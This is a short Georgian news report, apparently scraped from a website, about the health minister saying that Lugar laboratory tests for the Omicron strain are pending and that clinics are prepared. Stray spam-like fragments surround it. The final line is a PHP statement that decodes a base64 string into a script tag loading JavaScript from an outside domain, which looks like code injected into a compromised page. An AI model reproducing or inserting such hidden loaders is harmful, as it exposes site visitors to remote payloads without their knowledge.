celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის განცხადებით, დღეისთვის „ომიკრონის“ შტამის გამოვლენის მიზნით ლუგარის ლაბორატორიაში რამდენიმე შემთხვევაზე კვლევა მიმდინარეობს. ამის შესახებ მან ჟურნალისტებს განუცხადა.
 
კითხვას - როგორ მოხდება ეპიდვითარების მართვა ქვეყანაში, მაშინ როდესაც ჯანდაცვის მინისტრი პოსტს ტოვებს, ეკატერინე ტიკარაძემ ასე უპასუხა:
 
„ჩვენ ველოდებით ლუგარის ლაბორატორიის პასუხს; მნიშვნელოვანია დაველოდოთ მტკიცებულებაზე დაყრდნობით არის თუ არა ქვეყანაში ომიკრონის შტამი;
 
აქედან გამომდინარე მივმართავთ იმ ღონისძიებებს, რა პრაქტიკაც აქვთ იმ ქვეყნებს, სადაც უკვე "ომიკრონი" დადასტურდა. კლინიკური სექტორი მზად არის როგორც მკურნალობის კუთხით არსებული გაიდლაინებით, ასევე საწოლფონდით, რომელიც გაუმკლავდება ამ გამოწვევას“, - განაცხადა მინისტრმა.
1010
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");